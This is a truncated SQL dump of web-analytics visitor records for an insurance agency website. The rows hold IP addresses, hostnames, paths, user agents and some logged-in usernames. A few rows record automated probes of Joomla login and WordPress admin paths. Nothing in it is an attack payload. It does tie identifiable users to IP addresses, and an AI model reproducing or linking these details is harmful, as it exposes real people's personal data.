1080','','','','','','0','0',0),(3466,'0b_5be303a268b8d696a3a8d9de283a46d8','1457642209','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(3469,'0b_5be303a268b8d696a3a8d9de283a46d8','1457642219','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3472,'0b_ab05f55dabb42dc6defef7fc42e38b65','1457642268','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3474,'0b_92c391ec676ba2a3b41cb3d7568beb50','1457642479','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','','','','','','','0','0',0),(3475,'0b_92c391ec676ba2a3b41cb3d7568beb50','1457642480','75.99.148.62','ool-4b63943e.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','','','','','','','0','0',0),(3477,'0b_5be303a268b8d696a3a8d9de283a46d8','1457642575','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(3478,'0b_8ae560c4c64cc40c7b15fa4343513fce','1457642769','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3481,'0b_8ae560c4c64cc40c7b15fa4343513fce','1457642771','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(3483,'0b_ea2baff952f58c0de8ab946c98b45c67','1457642777','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3486,'0b_ea2baff952f58c0de8ab946c98b45c67','1457642778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(3487,'0b_0d7c33815927b70b3f9a87f64b0fcf71','1457645142','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3489,'0b_0d7c33815927b70b3f9a87f64b0fcf71','1457645144','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3492,'0b_a9eecb0f74bda89ec6fc42187bf3ef69','1457646008','136.243.172.46','static.46.172.243.136.clients.your-server.de','/index.php?option=com_users&view=login','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','3','0',0),(3495,'0b_a9eecb0f74bda89ec6fc42187bf3ef69','1457646008','136.243.172.46','static.46.172.243.136.clients.your-server.de','/index.php?option=com_user&view=login','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','3','0',0),(3498,'0b_a9eecb0f74bda89ec6fc42187bf3ef69','1457646009','136.243.172.46','static.46.172.243.136.clients.your-server.de','/?option=com_users&view=login','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','3','0',0),(3501,'0b_a9eecb0f74bda89ec6fc42187bf3ef69','1457646009','136.243.172.46','static.46.172.243.136.clients.your-server.de','/?option=com_user&view=login','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','de','','','','','','','3','0',0),(3504,'0b_6f56ddab857f5dbe435374f8da419f91','1457647701','204.239.3.11','vpn.cmrefsi.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(3505,'0b_6f56ddab857f5dbe435374f8da419f91','1457647703','204.239.3.11','vpn.cmrefsi.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(3508,'0b_d781d189ff8a4f5eea99f9e699faa170','1457648536','180.76.15.158','baiduspider-180-76-15-158.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(3511,'0b_4dc7bf847dc57a5286fbc09397bd17ad','1457648976','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3514,'0b_4dc7bf847dc57a5286fbc09397bd17ad','1457648977','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(3516,'0b_635495fd56bf8408828b166fb44d761f','1457652650','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(3517,'0b_9af9ffed4faba0b6a5f16c5846041946','1457653069','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 48','','','','','','','','0','0',0),(3520,'0b_9af9ffed4faba0b6a5f16c5846041946','1457653071','91.200.12.136','dsystemip3.vhoster.org','/register/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/register/','',0,'Win10','Chrome 48','','','','','','','','0','0',0),(3522,'0b_9af9ffed4faba0b6a5f16c5846041946','1457653076','91.200.12.136','dsystemip3.vhoster.org','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win10','Chrome 48','','','','','','','','0','0',0),(3525,'0b_9af9ffed4faba0b6a5f16c5846041946','1457653078','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win10','Chrome 48','','','','','','','','0','0',0),(3528,'0b_9af9ffed4faba0b6a5f16c5846041946','1457653080','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/index.php','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/index.php','',0,'Win10','Chrome 48','','','','','','','','0','0',0),(3531,'0b_5a75f1aa78521ac36b94be5f31ecc167','1457654012','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com/agent-tools/','',0,'Win10 x64','Firefox 43','','','','','','','','0','0',0),(3532,'0b_5a75f1aa78521ac36b94be5f31ecc167','1457654013','91.200.12.136','dsystemip3.vhoster.org','/register/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com/register/','',0,'Win10 x64','Firefox 43','','','','','','','','0','0',0),(3534,'0b_5a75f1aa78521ac36b94be5f31ecc167','1457654016','91.200.12.136','dsystemip3.vhoster.org','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win10 x64','Firefox 43','','','','','','','','0','0',0),(3535,'0b_5a75f1aa78521ac36b94be5f31ecc167','1457654017','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win10 x64','Firefox 43','','','','','','','','0','0',0),(3538,'0b_5a75f1aa78521ac36b94be5f31ecc167','1457654020','91.200.12.136','dsystemip3.vhoster.org','/agent-tools/index.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0','http://www.empireins.com/index.php','',0,'Win10 x64','Firefox 43','','','','','','','','0','0',0),(3541,'0b_e63685ef94f3c0038bec171676274f9f','1457658856','180.76.15.134','baiduspider-180-76-15-134.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(3543,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457659692','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3544,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457659703','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3546,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457659967','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(3547,'0b_955a5ed93c390fdf4a58ad882d3f91aa','1457660099','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(3549,'0b_6e11bb1cb303330496e127aa6a9b8e18','1457660286','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3550,'0b_1b4314834bde7181639aca880b37e35c','1457663083','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3553,'0b_f33b31ea4fa14ddec2a5dd73c1a162dc','1457664052','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3555,'0b_9953fa397d878420490e1c724d820511','1457664472','40.77.167.66','msnbot-40-77-167-66.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3558,'0b_76523a7378acbe67ff60df019369fe65','1457665992','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3560,'0b_3bef32ab675bc127df44e81e39ca5662','1457669905','180.76.15.9','baiduspider-180-76-15-9.crawl.baidu.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3563,'0b_dcf58240c05af96071621b67d7c865b2','1457671030','157.55.39.63','msnbot-157-55-39-63.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3566,'0b_0d6386928d4cb49e2a044a709c15ffda','1457671421','66.249.83.246,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(3569,'0b_5d8ef83976703107104348e61a65ea82','1457671422','66.249.83.213,47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(3572,'0b_e1fd5e2a10990d22c4147aa8418d064e','1457674606','45.55.134.11','45.55.134.11','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(3575,'0b_8abc152c573a033a800e798cc0526418','1457674633','45.55.134.11','45.55.134.11','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(3576,'0b_56fb59fcec5592c2e7227673685bcb6d','1457676644','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','YaBrowser 15','','','','','','','','0','0',0),(3578,'0b_56fb59fcec5592c2e7227673685bcb6d','1457676646','91.200.12.7','dsystemip5.vhoster.org','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36','http://www.empireins.com/register/','',0,'Win7','YaBrowser 15','','','','','','','','0','0',0),(3579,'0b_56fb59fcec5592c2e7227673685bcb6d','1457676649','91.200.12.7','dsystemip5.vhoster.org','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','YaBrowser 15','','','','','','','','0','0',0),(3582,'0b_56fb59fcec5592c2e7227673685bcb6d','1457676650','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','YaBrowser 15','','','','','','','','0','0',0),(3584,'0b_56fb59fcec5592c2e7227673685bcb6d','1457676652','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/index.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 YaBrowser/15.12.1.6475 Safari/537.36','http://www.empireins.com/index.php','',0,'Win7','YaBrowser 15','','','','','','','','0','0',0),(3587,'0b_035a2c6568f30fba5bb390c4cf1c9bca','1457677354','151.138.13.244','151.138.13.244','/','SuperPagesUrlVerifyBot/1.0','','',0,'','','','','','SuperPagesUrlVerifyBot','','','','0','0',0),(3590,'0b_63a025251a46023d521b5c9ff68cd294','1457677674','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','http://www.empireins.com/agent-tools/','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(3593,'0b_63a025251a46023d521b5c9ff68cd294','1457677676','91.200.12.7','dsystemip5.vhoster.org','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','http://www.empireins.com/register/','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(3594,'0b_63a025251a46023d521b5c9ff68cd294','1457677679','91.200.12.7','dsystemip5.vhoster.org','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(3597,'0b_63a025251a46023d521b5c9ff68cd294','1457677681','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(3600,'0b_63a025251a46023d521b5c9ff68cd294','1457677684','91.200.12.7','dsystemip5.vhoster.org','/agent-tools/index.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37','http://www.empireins.com/index.php','',0,'Win7','Google Chrome','','','','','','','','0','0',0),(3603,'0b_5a7feb211667e43b82fb5ea563ed899f','1457681391','198.54.90.200','198.54.90.200','/','Mozilla/5.0 (compatible; +http://servernfo.com/)','','',0,'','','','','','','','','','0','0',0),(3606,'0b_eb9b2fd1fe3fbf087fd6c25c8dcada6d','1457684660','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(3609,'0b_3f129324b4218d4899bd0089d48e2a21','1457685092','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3611,'0b_3f129324b4218d4899bd0089d48e2a21','1457685094','144.76.93.46','static.46.93.76.144.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3612,'0b_3f129324b4218d4899bd0089d48e2a21','1457685097','144.76.93.46','static.46.93.76.144.clients.your-server.de','/agent-tools/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3614,'0b_3f129324b4218d4899bd0089d48e2a21','1457685099','144.76.93.46','static.46.93.76.144.clients.your-server.de','/carriers/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3617,'0b_3f129324b4218d4899bd0089d48e2a21','1457685102','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-status/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3620,'0b_3f129324b4218d4899bd0089d48e2a21','1457685104','144.76.93.46','static.46.93.76.144.clients.your-server.de','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3621,'0b_3f129324b4218d4899bd0089d48e2a21','1457685107','144.76.93.46','static.46.93.76.144.clients.your-server.de','/comments/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3624,'0b_3f129324b4218d4899bd0089d48e2a21','1457685109','144.76.93.46','static.46.93.76.144.clients.your-server.de','/contact/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3626,'0b_3f129324b4218d4899bd0089d48e2a21','1457685111','144.76.93.46','static.46.93.76.144.clients.your-server.de','/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3629,'0b_3f129324b4218d4899bd0089d48e2a21','1457685113','144.76.93.46','static.46.93.76.144.clients.your-server.de','/forms/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3630,'0b_3f129324b4218d4899bd0089d48e2a21','1457685118','144.76.93.46','static.46.93.76.144.clients.your-server.de','/home/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3632,'0b_3f129324b4218d4899bd0089d48e2a21','1457685121','144.76.93.46','static.46.93.76.144.clients.your-server.de','/term-quotes/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(3635,'0b_d657138cabe031af53078af3beabd837','1457685855','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3636,'0b_8087c4d847119b94650ad896df8eb304','1457686850','31.31.73.93','niniel.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(3639,'0b_8087c4d847119b94650ad896df8eb304','1457686865','31.31.73.93','niniel.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(3641,'0b_358d5c857894845e52d4533fea5a34ef','1457687703','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3644,'0b_8422a4e3daa9575cc863a57e703c674f','1457693925','208.115.111.66','208-115-111-66-reverse.wowrack.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3645,'0b_825a07e88547908d615f5889f4520d84','1457695135','213.239.211.141','static.213-239-211-141.clients.your-server.de','/robots.txt','','','',0,'','','de','','','Unknown Spider','','','','0','0',0),(3648,'0b_bf920c71cd8b539a9d50b80171c756c6','1457695136','213.239.211.141','static.213-239-211-141.clients.your-server.de','/','Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0','','',0,'Linux','Firefox 5','de','','','','','','','0','0',0),(3651,'0b_ebaed59783e2b03824fcdc0ed3652d7d','1457695798','52.2.28.246','ec2-52-2-28-246.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36','','',0,'Win7','Chrome 28','','','','','','','','0','0',0),(3654,'0b_0e452faea819f6528a508bd0329d462e','1457698344','141.8.143.242','spider-141-8-143-242.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(3656,'0b_6f262a2171c34d328c5dc464ffe3fe49','1457699464','151.80.40.50','ns3556902.ip-151-80-40.eu','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(3657,'0b_3d6f695ee11694fd6bc5fbed724a486f','1457701371','93.153.41.222','93-153-41-222.tmcz.cz','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','','',0,'Win7','Firefox 36','cz','','','','','','','3','0',0),(3659,'0b_780579561883e7eda73c6613ed396e15','1457702621','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(3662,'0b_7d8179eaf429d1c8e1cb6f3dab7e4f97','1457702690','70.193.208.21','21.sub-70-193-208.myvzw.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','http://www.bing.com/search?q=empire+insuranc&a=results&MID=2500','empire insuranc',1,'iPhone OS','Safari 8 Mobile','us','375 x 667','Bing','','','','','0','0',0),(3663,'0b_7d8179eaf429d1c8e1cb6f3dab7e4f97','1457702692','70.193.208.21','21.sub-70-193-208.myvzw.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','us','375 x 667','','','','','','0','0',0),(3665,'0b_7d8179eaf429d1c8e1cb6f3dab7e4f97','1457702706','70.193.208.21','21.sub-70-193-208.myvzw.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','us','375 x 667','','','','','','0','0',0),(3668,'0b_bca8718abd5f036fc9600d3b14a0efd2','1457703640','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3669,'0b_eae71cf7d46f00c97da9b67a754ced86','1457705186','75.99.148.62','ool-4b63943e.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 